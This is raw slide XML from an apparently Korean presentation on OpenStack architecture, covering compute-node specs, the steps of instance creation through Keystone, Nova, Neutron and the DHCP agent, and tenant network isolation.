            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Text 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4968494" y="4441317"/>
            <a:ext cx="2255012" cy="14447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Qemu /KVM</a:t>
            </a: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최적화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Text 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4961534" y="4941494"/>
            <a:ext cx="1650322" cy="18745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controller, network</a:t>
            </a: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 노드 통합 관리</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8026451" y="1610106"/>
            <a:ext cx="3495751" cy="4866589"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 114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92" name="Text 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8645144" y="3810609"/>
            <a:ext cx="2255012" cy="14447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OS: </a:t>
            </a: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로키 리눅스 </a:t>
            </a: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9.5</a:t>
            </a:r>
          </a:p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Ram: 16gb</a:t>
            </a:r>
          </a:p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용량</a:t>
            </a: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300gb</a:t>
            </a:r>
          </a:p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Hypervisor: QEMU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="F1F5F9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93" name="Text 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8645144" y="5402275"/>
            <a:ext cx="1650322" cy="18745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altLang="ko-KR" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="F1F5F9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94" name="Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8035595" y="1600200"/>
            <a:ext cx="3476549" cy="57607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="818CF8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5" name="Text 61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8262975" y="1790700"/>
            <a:ext cx="3019349" cy="33375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Compute Node</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="1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97" name="Text 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8645144" y="4766767"/>
            <a:ext cx="2255012" cy="14447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Service: Nova-compute</a:t>
            </a:r>
          </a:p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IP: 172.16.0.134</a:t>
            </a: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4"/>
          <a:srcRect l="14870" t="33820" r="16440" b="39100"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4358944" y="2563483"/>
            <a:ext cx="3486608" cy="84615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4"/>
          <a:srcRect l="14870" t="33820" r="16440" b="39100"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8035595" y="2566794"/>
            <a:ext cx="3486607" cy="8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8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71500" y="381305"/>
            <a:ext cx="571500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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="533095"/>
            <a:ext cx="4962600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OpenStack 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생성의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" b="1" kern="0" spc="-67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5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단계 여정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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-505" r="-505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632558" y="3614623"/>
            <a:ext cx="114300" cy="18105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rcRect l="-505" r="-505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903927" y="3614623"/>
            <a:ext cx="114300" cy="18105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 l="-505" r="-505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7174382" y="3614623"/>
            <a:ext cx="114300" cy="18105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rcRect l="-505" r="-505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9444838" y="3614623"/>
            <a:ext cx="114300" cy="181051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571500" y="1695298"/>
            <a:ext cx="1971446" cy="4591202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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269187" y="1990649"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="94A3B8">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="94A3B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rcRect l="-80" r="-80"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1411834" y="2162556"/>
            <a:ext cx="286207" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673913" y="2704795"/>
            <a:ext cx="1764792" cy="3721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3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Horizon &amp; Keystone</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675742" y="3147365"/>
            <a:ext cx="1764792" cy="22009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사용자가</a:t>
            </a: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대시보드에서 사양</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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선택하고 클릭</a:t>
            </a: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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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Keystone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이 사용자 권한 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724205" y="5484571"/>
            <a:ext cx="1666951" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14055"/>
            </a:avLst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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724205" y="5484571"/>
            <a:ext cx="1666951" cy="19202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="94A3B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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779069" y="5598871"/>
            <a:ext cx="155722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00" b="1" kern="0" spc="42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CONTROL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770839" y="5797296"/>
            <a:ext cx="1573682" cy="20025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인증</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2841955" y="1695298"/>
            <a:ext cx="1971446" cy="4591202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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3539642" y="1990649"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3EE">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="22D3E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0635" y="2162556"/>
            <a:ext cx="228600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2931566" y="2704795"/>
            <a:ext cx="1793138" cy="3721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3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Nova API &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="13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Scheduler</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946197" y="3147365"/>
            <a:ext cx="1764792" cy="22009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Nova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가 요청을 받고 </a:t>
            </a:r>
            <a:b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</a:b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스케쥴러가 </a:t>
            </a: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compute node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/>
            </a:r>
            <a:b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</a:b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탐색 후 노드 결정</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994660" y="5484571"/>
            <a:ext cx="1666951" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14055"/>
            </a:avLst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17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994660" y="5484571"/>
            <a:ext cx="1666951" cy="19202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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3049524" y="5598871"/>
            <a:ext cx="155722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00" b="1" kern="0" spc="42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CONTROL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3041294" y="5797296"/>
            <a:ext cx="1573682" cy="20025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노드 결정</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5113325" y="1695298"/>
            <a:ext cx="1971446" cy="4591202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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5810098" y="1990649"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="818CF8">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="818CF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6"/>
          <a:srcRect l="-57" r="-57"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5995721" y="2162556"/>
            <a:ext cx="200254" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202936" y="2704795"/>
            <a:ext cx="1793138" cy="3721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3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Network(Neutron)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5216652" y="3147365"/>
            <a:ext cx="1764792" cy="22009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Neutron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이 인스턴스가</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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사용할 가상 포트를 준비 후</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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IP 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주소 예약</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5265115" y="5484571"/>
            <a:ext cx="1666951" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14055"/>
            </a:avLst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4" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5265115" y="5484571"/>
            <a:ext cx="1666951" cy="19202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Text 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5320894" y="5598871"/>
            <a:ext cx="155722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00" b="1" kern="0" spc="42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CONTROL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5312664" y="5797296"/>
            <a:ext cx="1573682" cy="20025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네트워크 통로 확보</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7383780" y="1695298"/>
            <a:ext cx="1971446" cy="4591202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8" name="Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8081467" y="1990649"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="34D3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9" name="Imag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52460" y="2162556"/>
            <a:ext cx="228600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Text 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7564831" y="2704795"/>
            <a:ext cx="1612087" cy="3721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3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Compute node </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7488022" y="3147365"/>
            <a:ext cx="1764792" cy="22009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Rocky LInux 9.5 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커널</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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위에서 </a:t>
            </a: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QEMU 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가상화</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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바이너리를 통해 </a:t>
            </a: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CPU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와</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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리소스 소프트웨어적으로 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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에물레이션하여 인스턴스 구동</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7536485" y="5484571"/>
            <a:ext cx="1666951" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14055"/>
            </a:avLst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3" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7536485" y="5484571"/>
            <a:ext cx="1666951" cy="19202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D39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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7591349" y="5598871"/>
            <a:ext cx="155722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00" b="1" kern="0" spc="42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CONTROL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7583119" y="5797296"/>
            <a:ext cx="1573682" cy="20025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인스턴스 실체화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9655150" y="1695298"/>
            <a:ext cx="1971446" cy="4591202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37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10351922" y="1990649"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F472B6">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="F472B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8" name="Image 8" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect l="-80" r="-80"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10494569" y="2162556"/>
            <a:ext cx="286207" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9789566" y="2704795"/>
            <a:ext cx="1698041" cy="3721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3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DHCP Agent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9758477" y="3147365"/>
            <a:ext cx="1764792" cy="22009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Network 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노드의</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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DHCP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Agent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가 새로 뜬</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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VM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에 예약된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="10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를 할당</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9806940" y="5484571"/>
            <a:ext cx="1666951" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14055"/>
            </a:avLst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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9806940" y="5484571"/>
            <a:ext cx="1666951" cy="19202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F472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3" name="Text 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9862718" y="5598871"/>
            <a:ext cx="155722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00" b="1" kern="0" spc="42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CONTROL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9853574" y="5797296"/>
            <a:ext cx="1573682" cy="20025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네트워크 주소</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1401775" y="1561795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6" name="Text 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1419149" y="1612087"/>
            <a:ext cx="27432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1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3673145" y="1561795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8" name="Text 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690518" y="1612087"/>
            <a:ext cx="27432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1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Shape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="1561795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0" name="Text 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5960974" y="1612087"/>
            <a:ext cx="27432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1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Shape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8214970" y="1561795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2" name="Text 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8232343" y="1612087"/>
            <a:ext cx="27432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sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Shape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485425" y="1561795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4" name="Text 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10502798" y="1612087"/>
            <a:ext cx="27432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551749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테넌트 네트워크 구조 및 보안 격리 전략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1510" r="-1510"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10253167" y="1042416"/>
            <a:ext cx="171907" cy="133502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381305" y="390449"/>
            <a:ext cx="5677510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OpenStack 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구조</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10500970" y="1013155"/>
            <a:ext cx="1414577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Neutron Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="1547165"/>
            <a:ext cx="7563002" cy="4934102"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 42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22D3EE">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="1016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371246" y="153710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371246" y="15371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7763256" y="153710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7934249" y="15371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371246" y="6467551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371246" y="6295644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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7763256" y="6467551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7934249" y="6295644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1144829" y="1937614"/>
            <a:ext cx="6038698" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 21333"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EF4444">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="EF4444"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" dist="381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04184" y="2136495"/>
            <a:ext cx="152705" cy="152705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2924251" y="2108606"/>
            <a:ext cx="2714854" cy="2286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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="F87171"/>
                </a:solidFill>
